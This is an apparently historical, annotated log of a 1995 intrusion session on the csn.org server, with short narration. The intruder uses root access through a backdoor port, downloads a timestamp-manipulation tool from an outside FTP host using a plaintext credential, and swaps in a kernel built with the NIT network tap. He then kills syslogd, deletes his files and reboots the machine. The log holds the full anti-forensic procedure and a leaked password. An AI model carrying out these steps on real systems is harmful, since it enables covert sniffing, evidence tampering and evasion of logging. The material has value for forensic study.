Kevin On Demand
- Dumb and Dumber - kevin-on-demand.takedown.com 4015
- Start: 1995 Feb 11 00:21:55
- Total Run Time: 7:15
- From NETCOM-rtp1.netcom.net to netcom15.netcom.com.
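- The previous night, Kevin rebuilt the kernel (the essential parts of the operating system on a Unix host) on Colorado SuperNet's server, csn.org, to include NIT (the Network Interface Tap, SunOS's facility for watching what happens on the network), using the CERT advisory on how to remove NIT as a guide. Watch him thrash while trying to install the new kernel (he could have done exactly what he wanted with a one-line command) and then reboot their system so that the new kernel takes effect. He makes several mistakes along the way, which make the task take much longer and be more complex than necessary. In the listing below, note that after the swap /vmunix and /vmunix.bak still show their Nov 5 1993 dates while their sizes have traded places, and that syslogd is killed before the reboot; a size or checksum comparison, not the dates, is what shows that the kernel changed.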
drwxr-xr-x 4 root 3072 Dec 5 15:08 u32
drwxr-xr-x 5 root 2048 Dec 1 21:24 u31
drwxr-xr-x 4 root 2560 Nov 30 19:32 u30
-rwxr--r-- 1 root 1790901 Oct 24 15:24 vmunix
lrwxrwxrwx 1 root 9 Oct 24 13:43 core -> /dev/null
drwxr-xr-x 32 root 1024 Oct 17 21:17 usr
drwx------ 2 root 512 Oct 14 15:57 .mailbox
lrwxrwxrwx 1 root 7 Sep 14 12:11 bin -> usr/bin
lrwxrwxrwx 1 root 13 Sep 14 12:11 sys -> ./usr/kvm/sys
lrwxrwxrwx 1 root 7 Sep 14 12:11 lib -> usr/lib
drwxr-xr-x 2 root 512 Sep 14 12:11 sbin
drwxr-xr-x 4 root 512 Sep 14 12:10 export
lrwxrwxrwx 1 root 8 Sep 14 12:10 tmp -> /var/tmp
lrwxrwxrwx 1 root 9 Sep 14 12:10 home -> /var/home
-rwxr--r-- 1 root 1790805 Sep 13 17:34 vmunix.old
-rw-r--r-- 1 root 89 Sep 11 21:52 .profile
-rw-r--r-- 1 root 164 Sep 11 21:52 .cshrc
-rw-r--r-- 1 root 62 Sep 11 21:52 .login
-r--r--r-- 1 root 103512 Sep 8 15:59 boot
-rwxr-xr-x 1 root 250272 Sep 8 15:59 kadb
-rwxr--r-- 1 root 2194718 Sep 8 15:59 vmunix.orig
drwxr-xr-x 2 root 512 Sep 8 15:45 pcfs
drwxr-xr-x 2 root 8192 Sep 8 15:41 lost+found
$ ./test1
./test1: not found
$ cd
$ ./test1
test1> open csn.org 3111
Trying 199.117.27.21 ...
Connected to csn.org.
Escape character is '^]'.
nm
SunOS UNIX (csn)
csn# ps
PID TT STAT TIME COMMAND
11082 p1 S 0:00 -sh -i (csh)
11089 p1 R 0:00 ps
9078 p5 S 0:17 sendmail -R bridget.newcastle.co.us
csn# w
1:22am up 13:18, 16 users, load average: 16.47, 13.39, 11.23
User tty login@ idle JCPU PCPU what
Uhumpbac ttyp4 12:14am 1:16 1:16 -uucico
runmailq ttyp5 1:03am 18 /bin/csh -f /usr/local/etc/rmqs
runmailq ttyp7 12:23am 59 /bin/csh -f /usr/local/etc/rmqs
Udlsinet ttyp8 12:10am 1:10 1:10 -uucico
Uraptor ttyp9 1:09am 15 15 -uucico
Uxvt ttypd 11:10pm 2:09 2:09 -uucico
Usraco1 ttypf 12:19am 55 55 -uucico
Unte ttyq0 1:07am 16 16 -uucico
Uexcalnf ttyq1 12:07am 48 48 -uucico
Ucygcyb ttyq2 1:13am 9 9 -uucico
Uenterpr ttyq3 1:17am 5 5 -uucico
Umaple ttyq4 1:21am 1 1 1 -uucico
Uhotelne ttyq5 1:22am -uucico
Uneocad ttyq6 6:26pm 5:22 5:22 -uucico
Uctnet ttyq7 1:20am 1 1 -uucico
Ulookout ttyq8 1:20am 2 2 -uucico
csn# cd /
csn# ls -tla vm*
-rwxr-xr-x 1 root 1916938 Nov 5 1993 vmunix
-rwxr-xr-x 1 root 1926973 Nov 5 1993 vmunix.bak
csn# ftp
ftp> open well.sf.ca.us
Connected to well.sf.ca.us.
220 well FTP server (UNIX(r) System V Release 4.0) ready.
Name (well.sf.ca.us:root): dono
331 Password required for dono.
Password: fucknmc
230 User dono logged in.
ftp> bin
200 Type set to I.
ftp> get time
200 PORT command successful.
150 Binary data connection for time (128.138.213.21,1289) (16384 bytes).
/: write failed, file system is full
/: write failed, file system is full
time: No space left on device
226 Binary Transfer complete.
local: time remote: time
1072 bytes received in 0.26 seconds (4 Kbytes/s)
ftp> get time /tmp
200 PORT command successful.
150 Binary data connection for time (128.138.213.21,1292) (16384 bytes).
/tmp: Is a directory
226 Binary Transfer complete.
421 Service not available, remote server has closed connection
ftp> get time /tmp/time
Not connected.
ftp> quit
csn# rm time
csn# cd /tmp
csn# ftp
ftp> open well.sf.ca.us
Connected to well.sf.ca.us.
220 well FTP server (UNIX(r) System V Release 4.0) ready.
Name (well.sf.ca.us:root): dono
331 Password required for dono.
Password: fucknmc
230 User dono logged in.
ftp> bin
200 Type set to I.
ftp> get time
200 PORT command successful.
150 Binary data connection for time (128.138.213.21,1300) (16384 bytes).
226 Binary Transfer complete.
local: time remote: time
16384 bytes received in 1.7 seconds (9.2 Kbytes/s)
ftp> quit
221 Goodbye.
csn# chmod 777 time
csn# ./time /vmunix > foo
csn# cat foo
/vmunix 792490984 752543991 779041123 0 1 33261
csn# ./time /vmunix.bak > bar
csn# cp /vmunix .
csn# cp /vmunix.bak /vmunix
/: write failed, file system is full
/: write failed, file system is full
cp: /vmunix: No space left on device
csn# cp /vmunix.bak newunix
csn# rm /vmunix.bak
csn# cp newunix /vmunix
csn# ./time < foo
csn# ls t-la /vm*
t-la not found
/vmunix
csn# ls -tla /vm*
-rwxr-xr-x 1 root 1926973 Nov 5 1993 /vmunix
csn# cp vmunix /vmunix.bak
csn# ./time < bar
csn# ls -tla /vm*
-rwxr-xr-x 1 root 1926973 Nov 5 1993 /vmunix
-rwxr-xr-x 1 root 1916938 Nov 5 1993 /vmunix.bak
csn# cd /tmp
csn# rm foo bar *unix*
csn# rm time
csn# ls -tla | head
total 201
drwxrwxrwt 3 root 1428 Feb 11 01:26 .
-rw------- 1 root 65536 Feb 11 01:26 twza08692
drwxrwxr-x 19 root 1024 Feb 11 01:25 ..
-rw-r----- 1 uucp 0 Feb 11 01:08 rnlog.9541
-rw-r----- 1 uucp 1283 Feb 11 01:08 rnews.9541
-rw------- 1 root 0 Feb 11 01:00 croutIJAa00130
-rw-r----- 1 uucp 6945 Feb 11 00:20 rnews.4211
-rw-r----- 1 uucp 0 Feb 11 00:20 rnlog.4211
-rw-r----- 1 uucp 0 Feb 11 00:12 rnlog.3118
csn# pwd
/tmp
csn# w
w: cannot allocate space for percpu_ptpe: Not enough memory
csn# ps
ps: cannot allocate space for percpu_ptpe: Not enough memory
ps: could not read kernel VM
csn# ftp
ftp> open well.sf.ca.us
Connected to well.sf.ca.us.
220 well FTP server (UNIX(r) System V Release 4.0) ready.
Name (well.sf.ca.us:root): dono
331 Password required for dono.
Password: fucknmc
230 User dono logged in.
ftp> bin
200 Type set to I.
ftp> get time
200 PORT command successful.
150 Binary data connection for time (128.138.213.21,1364) (16384 bytes).
226 Binary Transfer complete.
local: time remote: time
16384 bytes received in 1.4 seconds (12 Kbytes/s)
ftp> quit
221 Goodbye.
csn# chmod 777 time
csn# cp /vm* .
csn# ./time /vmunix > foo
csn# ./time /vmunix.bak > bar
csn# cp vmunix.bak /vmunix
csn# ps -aux | grep sysl
root 11731 0.0 0.2 32 204 p1 S 01:27 0:00 grep sysl
root 9721 0.0 0.3 60 300 ? S 01:11 0:02 /usr/etc/syslogd
csn# kill -9 9721
csn# cp vmunix* /
csn# ./time < foo
csn# ./time < bar
csn# ls t-la /vmun*
t-la not found
/vmunix /vmunix.bak
csn# ls -tla /vm*
-rwxr-xr-x 1 root 1926973 Nov 5 1993 /vmunix
-rwxr-xr-x 1 root 1916938 Nov 5 1993 /vmunix.bak
csn# rm *unix* foo bar time
csn# pwd
/tmp
csn# ls -tla | head
total 221
drwxrwxrwt 3 root 1428 Feb 11 01:28 .
-rw------- 1 root 86016 Feb 11 01:26 twza08692
drwxrwxr-x 19 root 1024 Feb 11 01:25 ..
-rw-r----- 1 uucp 1283 Feb 11 01:08 rnews.9541
-rw-r----- 1 uucp 0 Feb 11 01:08 rnlog.9541
-rw------- 1 root 0 Feb 11 01:00 croutIJAa00130
-rw-r----- 1 uucp 6945 Feb 11 00:20 rnews.4211
-rw-r----- 1 uucp 0 Feb 11 00:20 rnlog.4211
-rw-r----- 1 uucp 0 Feb 11 00:12 rnlog.3118
csn# cd /usr/etc
csn# ls sys*
syslog syslogd
csn# cd /etc
csn# grep sys rc.l*
# the anonymous memory based file system, have an fstab entry of the form:
# syslogd doesn't belong here, but needs to be started before the others.
# It needs to be started after NIS, though, so it can find the "syslog"
if [ -f /usr/etc/syslogd ]; then
echo 'starting system logger'
syslog
syslogd
# start up sysmond
#if [ -x /usr/local/sysmond/bin/sysmond ]; then
# /usr/local/sysmond/bin/sysmond > /dev/null &
csn# w
w: cannot allocate space for percpu_ptpe: Not enough memory
csn# /etc/reboot
Connection closed by foreign host.
$